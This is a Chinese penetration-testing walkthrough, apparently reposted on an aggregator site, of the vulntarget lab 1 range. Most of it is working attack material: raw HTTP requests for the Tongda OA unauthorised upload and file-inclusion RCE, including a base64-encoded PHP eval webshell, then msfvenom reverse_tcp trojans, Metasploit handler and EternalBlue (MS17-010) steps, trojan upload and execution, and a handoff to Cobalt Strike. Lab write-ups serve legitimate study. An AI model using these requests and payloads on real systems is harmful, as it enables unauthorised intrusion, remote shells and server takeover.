Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

这篇具有很好参考价值的文章主要介绍了Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Web安全:拿到 Web 服务器 最高权限.

Web 服务器一般指网站服务器,是指驻留于因特网上某种类型计算机的程序,可以处理浏览器等Web客户端的请求并返回相应响应,也可以放置网站文件,让全世界浏览;可以放置数据文件,让全世界下载.


目录:

Web安全:拿到 Web 服务器 最高权限.

免责声明:

网络环境所示:

主机信息:

拿到 Web 服务器 最高权限 测试:

第一步:信息收集.

第二步:漏洞探测.

第三步:漏洞利用.

使用通达 OA 未授权上传 + 文件包含RCE 测试.

使用 MS17-010 进行测试:

转移会话(msf 的会话传递到 cs 中.)


免责声明:

严禁利用本文章中所提到的虚拟机和技术进行任何形式的攻击,否则后果自负,上传者不承担任何责任。


网络环境所示:

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)


主机信息:

主机

外网

内网1 内网2
kali 192.168.0.101
win 7 192.168.0.102 10.0.20.98
win 2016 10.0.20.99 10.0.10.111
win 2019 10.0.10.110

拿到 Web 服务器 最高权限 测试:

第一步:信息收集.

使用 nmap 工具对服务器进行端口信息收集.

nmap -A -sV 192.168.0.102

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)


第二步:漏洞探测.

通达 OA 漏洞探测:(可以使用网上进行搜索.)

(1)http[s]:// 服务器 IP 地址/inc/expired.php
(2)http[s]:// 服务器 IP 地址/inc/reg_trial.php

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)


在上面 nmap 工具扫描中发现 445 端口也是开放的.(所以可以试试使用 MS17-010 进行测试.)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)


第三步:漏洞利用.

使用通达 OA 未授权上传 + 文件包含RCE 测试.

未授权上传 测试.

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

构造http请求包,获取图片马地址:
POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.0.102
Content-Length: 635
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$fn = fopen("bgxg.php","w+");
$st=base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydiZ3hnJ10pO3BocGluZm8oKTs/Pg==");
$result = fwrite($fn,$st);
fclose($fn);
?>

------WebKitFormBoundarypyfBh1YB4pV8McGB--

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

Base64 编码的过程:

https://c.runoob.com/front-end/693/

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

使用 文件包含 ,把图片中的代码执行,生成出一个新的 php 木马文件.
POST /ispirit/interface/gateway.php HTTP/1.1
Host: 192.168.0.102
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
Content-Length: 69
Content-Type: application/x-www-form-urlencoded

json={"url":"/general/../../attach/im/2306/589610612.jpg"}&cmd=whoami

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

访问使用了 包含漏洞 有没有生成出,新的木马文件出来.

木马文件的地址在文件包含目录中(/ispirit/interface/木马文件名)(bgxg.php)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

使用 蚁剑 进行连接.

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

生成一个程序(木马),使用 蚁剑 上传.(然后在 MSF 上线.)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.101 lport=4444 -f exe >bgxg.exe

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

(1)msfconsole        //打开 msf 命令

(2)use exploit/multi/handler        //加载模块 命令

(3)set payload windows/meterpreter/reverse_tcp        //设置 payload 命令

(4)set lhost 192.168.0.101                //设置本地监听 IP(就是 kali 的 IP)命令

(5)set LPORT 4444                    //设置本地监听端口(就是 kali 的 端口)命令

(6)run                //执行 命令

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)


使用 MS17-010 进行测试:

(1)msfconsole        //打开 msf 命令

(2)use exploit/windows/smb/ms17_010_eternalblue           //加载模块 命令

(3)show options            //查看模块信息

(5)set rhosts  192.168.0.102            //设置 服务器 IP 地址.(win7)

(7)run                //执行 命令

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)


转移会话(msf 的会话传递到 cs 中.)

服务端:

(1)cd cs4.7        //切换为 cs 目录

(2)./teamserver 192.168.0.101 888888      //这里的IP地址是 服务端的IP,后面的是客户端的登录密码.

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

客户端:
 
(1)cd cs4.7        // 切换为 cs 目录

(2)./start.sh        // 打开 客户端.

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

这里我重新生成一个程序(木马):

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.101 LPORT=8888 -f exe > bgxg.exe
(1)msfconsole            // 打开 msf 工具.

(2)use exploit/multi/handler            // 设置 模块 

(3)set payload windows/meterpreter/reverse_tcp        //设置 payload 

(4)set lhost 192.168.0.101             // 和程序(木马)一样的 IP 地址

(5)set lport 8888                      // 和程序(木马)一样的 端口 号.

(6)exploit                             // 进行 测试.

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

想方法 把程序(木马) 上传到 服务器(目标)上去.(这里上面有 蚁剑 可以直接上传,也可利用 MS17-010 漏洞上传.)
利用 MS17-010 漏洞上传程序(木马)

upload /root/bgxg.exe c:\\bgxg33.exe

upload 攻击机的文件位置 上传到目标机的文件位置和名字

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

shell        //进入目标机器的命令行下面

cd c:\\      //切换到程序(木马)的位置

bgxg33.exe    //执行程序(木马)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

把 msf 的会话传递到 cs 中.
(1)background                // 挂起 会话.

(2)use exploit/windows/local/payload_inject

(3)set payload windows/meterpreter/reverse_http

(4)set lhost 192.168.0.101        //设置 CS 服务端的 IP 地址.

(5)set lport 8080               //设置 CS 服务端的 监听的端口(刚刚上面创建的端口号一样[CS的])

(6)set DisablePayloadHandler True

(7)set PrependMigrate True

(8)sessions -l  //查看 会话 是多少则设置多少

(9)set session 1 [一般是 1(上面查看的结果)]

(10)exploit      // 进行 测试.

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

返回 CS 客户端:看见已经成功.

 Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

       

     

       

参考文章:CobaltStrike(CS)与MetasploitFramework(MSF)联动_Luckysec的博客-CSDN博客文章来源地址https://www.toymoban.com/news/detail-472227.html

到了这里,关于Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

    一、1.通过修改Cookie登录后台(没用重打)         2,上传SHELL!3,Flag在网站根目录(flag.php)         3.上传图片时建议上传小文件,建议用QQ表情         尤里通过XSS终于得到了管理员Cookie,在修改了cookie后尤里直接绕过了登录密码,         看到了后台功

    2024年02月07日
    浏览(42)
  • Web服务器安全基础知识

    Web服务器安全是指保护Web服务器和其中托管的Web应用程序不受恶意攻击和非法访问的一系列措施。在互联网时代,Web服务器安全已经成为各种规模的企业和组织不可或缺的一项重要工作。 Web服务器安全涉及到多个方面,包括但不限于: 防止未经授权的访问:保护Web服务器和

    2024年02月21日
    浏览(51)
  • WEB服务器的超级防护——安全WAF

          随着网络和信息技术的不断发展,特别是互联网的广泛普及和应用,网络正在逐步改变人类的生活和工作方式。越来越多的政府和企业组织建立了依赖于网络的业务信息系统,例如电子政务、网络办公等。网络也对社会各行各业产生了巨大的影响,使信息安全的重要性

    2024年02月20日
    浏览(42)
  • Web服务器群集:Nginx网页及安全优化

    目录 一、理论 1.Nginx网页优化 2.Nginx安全优化 3.Nginx日志分割 二、实验 1.网页压缩 2.网页缓存 3.连接超时设置 4.并发设置 5.隐藏版本信息  6.脚本实现每月1号进行日志分割 7.防盗链 三、总结 (1)概述 在企业中,部署Nginx后只采用默认的配置参数,会引发网站很多问题,换言

    2024年02月13日
    浏览(45)
  • 通过azure学生认证拿到一年服务器使用权

    通过azure学生认证 因为国内备案被迫找其他服务器 开始我买了一个华为的服务器,大家都知道,在国内,服务器是需要备案的。如果你备案过的话,就知道这个是非常麻烦的事情。时间久不说。过程也是非常的繁琐。这个繁琐的过程,完全打消了我企图使用域名访问正常访问

    2024年02月09日
    浏览(45)
  • chatGPT deBug解决管理员登入,服务器返回401,没有拿到数据

    连接钱包后,会调用函数,弹出窗口让用户签名 有了签名后,会调用signIn来设置本地存储 signIn函数 如果用户连接了钱包就会调接口,获取用户是否是管理员 通过RTK(redux toolkit)存储在isAdmin变量里 当isAdmin为true的时候,才显示member列表 后端接口也限制了,不是管理员拿不到数据

    2024年01月16日
    浏览(56)
  • 如何从Github拿到代码在云服务器跑起来--算力云从零搭建和配置GPU模型环境

    写在前面: 在服务器的Linux系统中复制使用Ctrl+shift+C,粘贴使用Ctrl+shift+V 1.首先拿到一份代码先研究他的readme.md也就是说明文档(至关重要),根据说明文档的详细程度可以间接判断代码能否跑起来,或者代码是否靠谱,不然花很多时间研究才发现代码没有可行性。以下我的代

    2024年04月13日
    浏览(56)
  • react18中antd的Upload组件上传头像,并且拿到服务器返回的头像的url地址在页面中显示头像

    业务需求:上传头像,上传完毕后拿到头像的url,把头像展示在页面中,最终把头像url和其他用户信息一起发送给服务器   上传头像流程   导入 Upload 组件和图标(一个加号,一个加载中)   定义状态   定义一个上传状态组件,上传前显示 + 号,上传时显示loading   组件代码(

    2023年04月22日
    浏览(39)
  • Samba服务权限问题:解决服务器访问权限限制

    Samba是一个常用的开源软件套件,用于实现文件和打印机共享,使得不同操作系统的计算机可以通过网络共享文件。然而,有时候在使用Samba服务时,可能会遇到权限问题,导致无法访问服务器上的共享资源。本文将介绍如何解决Samba服务权限问题,并提供相应的源代码示例。

    2024年02月04日
    浏览(42)
  • Apache服务器报错:拒绝访问,您没有权限访问服务器

    当您在尝试访问一个Apache服务器时,有时候可能会遇到类似于\\\"拒绝访问,您没有权限访问服务器\\\"的错误提示。这个错误通常表示您正在尝试访问一个需要特定权限的资源,但您的访问被服务器拒绝了。在本文中,我们将详细讨论这个问题的原因以及可能的解决方案。 出现这

    2024年02月04日
    浏览(52)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包